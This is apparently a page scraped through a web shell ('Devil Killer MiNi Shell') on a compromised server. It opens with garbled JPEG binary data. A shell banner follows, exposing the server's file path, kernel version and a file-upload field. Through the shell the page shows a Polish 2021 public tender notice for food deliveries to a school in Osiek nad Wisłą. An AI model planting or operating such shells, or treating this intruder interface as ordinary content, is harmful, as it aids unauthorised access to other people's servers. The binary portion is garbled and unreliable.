JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030768201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy artykułów żywnościowych dla Zespołu Szkół w Osieku nad Wisłą w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół w Osieku nad Wisłą</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340222734</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Leśna</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Osiek nad Wisłą</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-125</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566786529</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zsosieknadwisla.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zsosieknadwisla.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy artykułów żywnościowych dla Zespołu Szkół w Osieku nad Wisłą w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0a64f67d-58e0-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00307682</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00307324/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa artykułów żywnościowych na potrzeby Zespołu Szkół w Osieku nad Wisłą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/ , lub ePUAPu<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma<br/>dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza<br/>do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji<br/>elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania<br/>z miniPortalu oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie<br/>miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania przez ePUAP.<br/>Na elektroniczną skrzynkę podawczą Elektroniczna Skrzynka Podawcza: Skrytka ESP/ Zespół<br/>Szkół w Osieku nad Wisłą znajdująca się na platformie ePUAP .<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta<br/>Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal<br/>(Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie<br/>może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem postępowania nadanym przez<br/>Zamawiającego: ZP.271.1.2021.ZSO</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), publ. Dz. Urz. UE L Nr<br/>119, s. 1 informujemy, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Zespól Szkół w Osieku nad Wisłą ,<br/>reprezentowany przez Dyrektora ZS – Panią Katarzynę Wachowską (ul. Leśna 1 ,87-125<br/>Osiek nad Wisłą, telefon:566786529).<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się<br/>z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>1. Twoje dane osobowe przetwarzane będą na podstawie:<br/>XIV. KLAUZULA INFORMACYJNA WYNIKAJĄCA Z RODO<br/><br/>- 27 -<br/><br/>1) art. 6 ust. 1 lit c), art. 9 ust. 2 lit. g) i art. 10 RODO, w związku z ustawą z dnia 11<br/>września 2019 r. Prawo zamówień publicznych w celu realizacji obowiązku prawnego<br/>ciążącego na administratorze tj. udzielenia zamówienia publicznego,<br/>2) art. 6 ust. 1 lit b) RODO, w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych i regulaminem udzielania zamówień publicznych w celu wykonania umowy,<br/>której stroną jest osoba, której dane dotyczą tj. zawarcie odpłatnej umowy zawieranej<br/>między zamawiającym a wykonawcą, której przedmiotem jest usługa, dostawa lub robota<br/>budowlana (też umowa o podwykonawstwo),<br/>3) art. 6 ust. 1 lit a RODO na podstawie zgody. Zgoda jest wymagana, gdy uprawnienie do<br/>przetwarzania danych osobowych nie wynika wprost z przepisów prawa, a przekażesz<br/>administratorowi z własnej inicjatywy więcej danych niż jest to konieczne dla załatwienia<br/><br/>Twojej sprawy (tzw. działanie wyraźnie potwierdzające) np. podanie nr telefonu, adresu e-<br/>mail i inne.<br/><br/>2. Twoje dane osobowe możemy ujawniać, przekazywać i udostępniać wyłącznie<br/>podmiotom uprawnionym na podstawie obowiązujących przepisów prawa są nimi m.in.<br/>wykonawcy, podmioty świadczące usługi pocztowe, bankowe, telekomunikacyjne oraz<br/>inne podmioty, gdy wystąpią z takim żądaniem oczywiście w oparciu o stosowną podstawę<br/>prawną. Pracownikom oraz współpracownikom administratora. Twoje dane osobowe<br/>możemy także przekazywać podmiotom, które przetwarzają je na zlecenie administratora<br/>tzw. podmiotom przetwarzającym, są nimi m.in. podmioty świadczące usługi<br/>informatyczne i inne jednakże przekazanie Twoich danych nastąpić może tylko wtedy, gdy<br/>zapewnią one odpowiednią ochronę Twoich praw.<br/>3. Twoje dane osobowe przetwarzane będą do czasu istnienia podstawy do ich<br/>przetwarzania, w tym również przez okres przewidziany w przepisach dotyczących<br/>przechowywania i archiwizacji dokumentacji i tak:<br/>1) przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego,<br/>2) jeżeli czas trwania umowy przekracza 4 lata, przez czas trwania umowy, do czasu<br/>przedawnienia roszczeń,<br/>3) w zakresie danych, gdzie wyraziłeś zgodę na ich przetwarzanie, do czasu cofnięcie<br/>zgody, nie dłużej jednak niż do czasu wskazanego w pkt 1<br/>4. W związku z przetwarzaniem danych osobowych przez Administratora mają Państwo<br/>prawo do: 1) dostępu do treści danych, jednakże jeżeli spełnienie obowiązku prawa dostępu<br/>do danych osobie której dane dotyczą, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu,<br/>2) sprostowania danych,<br/>3) usunięcia danych, jeżeli:<br/><br/>- 28 -<br/><br/>a) wycofają zgodę na przetwarzanie danych osobowych,<br/>b) dane osobowe przestaną być niezbędne do celów, dla których zostały zebrane lub dla<br/>których były przetwarzane,<br/>c) dane są przetwarzane niezgodnie z prawem.<br/><br/>5) cofnięcia zgody w dowolnym momencie. Cofnięcie zgody nie wpływa na przetwarzanie<br/>danych dokonywane przez administratora przed jej cofnięciem.<br/>Szczegółowy zakres RODO został określony w rozdziale XXIV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">4) ograniczenia przetwarzania danych, jeżeli:<br/>a) osoba, której dane dotyczą, kwestionuje prawidłowość danych osobowych,<br/>b) przetwarzanie jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się<br/>usunięciu danych osobowych, żądając w zamian ograniczenia ich wykorzystywania,<br/>c) administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale są one<br/>potrzebne osobie, której dane dotyczą, do ustalenia, dochodzenia lub obrony roszczeń,<br/>d) osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania – do czasu<br/>stwierdzenia, czy prawnie uzasadnione podstawy po stronie administratora są nadrzędne<br/>wobec podstaw sprzeciwu osoby, której dane dotyczą. Wystąpienie osoby z żądaniem<br/>ograniczenia przetwarzania danych nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2021.ZSO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawy nabiału, pieczywa, owoców, warzyw i produktów mięsnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert (ocena ofert i przyznawanie punktów) będzie przebiegać odrębnie dla<br/>każdej części zamówienia.<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującym kryterium:<br/>• Kryterium 1- „Cena”<br/><br/>XVI. OPIS SPOSOBU OBLICZENIA CENY<br/><br/>XVII. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ<br/>PRZY WYBORZE OFERTY WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I<br/>SPOSOBU OCENY OFERT.<br/><br/>- 20 -<br/>Kryterium Znaczenie procentowe<br/>kryterium<br/><br/>Maksymalna ilość punktów<br/>jakie może otrzymać oferta<br/>za dane kryterium<br/>Cena ( C ) 60 % 60 punktów<br/>Kryterium &#34;Cena&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów<br/>wynikającąz działania:<br/>Cmin<br/><br/>Cmax =<br/>Ci<br/>● 60 punktów<br/><br/>gdzie:<br/>Cmin najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert;<br/>Ci cena oferty badanej;<br/>Cmax maksymalna ilość punktów jaką otrzymała dana oferta za kryterium &#34;Cena&#34;<br/><br/>• Kryterium 2- „Termin płatności”<br/><br/>Kryterium Znaczenie<br/>procentowe<br/>kryterium<br/><br/>Maksymalna ilość<br/>punktów jakie może<br/>otrzymać oferta za<br/>dane kryterium<br/><br/>Termin płatności (Tp) – 30 dni i<br/><br/>więcej<br/><br/>40<br/>%<br/><br/>40 punktów<br/><br/>Terminy płatności będą oceniane wg klucza:<br/>40 pkt- za oferowanie terminu płatności 30 dni i więcej<br/>25 pkt- za oferowanie terminu płatności do 21 dni<br/>15 pkt – za oferowanie terminu płatności od 7 do 14 dni<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę<br/>punktów stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów<br/><br/>wg poniższego wzoru:<br/><br/>- 21 -<br/>P= C + Tp<br/><br/>gdzie:<br/>P- suma punktów przyznanych w ramach każdego z podanych kryteriów<br/>C- liczba punktów przyznana ofercie w ramach kryterium Cena<br/>Tp- liczba punktów przyznana ofercie w ramach kryterium Termin płatności<br/><br/>Ocenie punktowej będą podlegać wyłącznie oferty uznane za ważne i nie podlegające<br/>odrzuceniu.<br/>2. W sytuacji, gdy Zamawiający nie będzie mógł wybrać najkorzystniejszej oferty, z uwagi na<br/>to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert,<br/>Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.<br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie<br/>wszystkim wymaganiom przedstawionym w ustawie Pzp oraz SWZ i zostanie oceniona, jako<br/>najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>5. W przypadku złożenia oferty tylko przez jednego wykonawcę, zamawiający dokona wyboru<br/>tej oferty jeżeli zostaną spełnione wszystkie kryteria określone w SWZ.<br/>6. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego<br/>Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym<br/>wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza<br/>do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić<br/>zgodnie z obowiązującymi przepisami.<br/>7. Zamawiający zgodnie z art. 223 ust. 2 Pzp poprawi w ofercie: omyłki pisarskie, oczywiste<br/>omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>inne omyłki polegające na niezgodności oferty dokumentami zamówienia, niepowodujące<br/>istotnych zmian w treści oferty – niezwłocznie zawiadamiając o tym Wykonawcę, którego<br/>oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są dostawy mrożonek, ryb ,owoców i warzyw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15200000-0 - Ryby przetworzone i konserwowane</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert (ocena ofert i przyznawanie punktów) będzie przebiegać odrębnie dla<br/>każdej części zamówienia.<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującym kryterium:<br/>• Kryterium 1- „Cena”<br/><br/>XVI. OPIS SPOSOBU OBLICZENIA CENY<br/><br/>XVII. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ<br/>PRZY WYBORZE OFERTY WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I<br/>SPOSOBU OCENY OFERT.<br/><br/>- 20 -<br/>Kryterium Znaczenie procentowe<br/>kryterium<br/><br/>Maksymalna ilość punktów<br/>jakie może otrzymać oferta<br/>za dane kryterium<br/>Cena ( C ) 60 % 60 punktów<br/>Kryterium &#34;Cena&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów<br/>wynikającąz działania:<br/>Cmin<br/><br/>Cmax =<br/>Ci<br/>● 60 punktów<br/><br/>gdzie:<br/>Cmin najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert;<br/>Ci cena oferty badanej;<br/>Cmax maksymalna ilość punktów jaką otrzymała dana oferta za kryterium &#34;Cena&#34;<br/><br/>• Kryterium 2- „Termin płatności”<br/><br/>Kryterium Znaczenie<br/>procentowe<br/>kryterium<br/><br/>Maksymalna ilość<br/>punktów jakie może<br/>otrzymać oferta za<br/>dane kryterium<br/><br/>Termin płatności (Tp) – 30 dni i<br/><br/>więcej<br/><br/>40<br/>%<br/><br/>40 punktów<br/><br/>Terminy płatności będą oceniane wg klucza:<br/>40 pkt- za oferowanie terminu płatności 30 dni i więcej<br/>25 pkt- za oferowanie terminu płatności do 21 dni<br/>15 pkt – za oferowanie terminu płatności od 7 do 14 dni<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę<br/>punktów stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów<br/><br/>wg poniższego wzoru:<br/><br/>- 21 -<br/>P= C + Tp<br/><br/>gdzie:<br/>P- suma punktów przyznanych w ramach każdego z podanych kryteriów<br/>C- liczba punktów przyznana 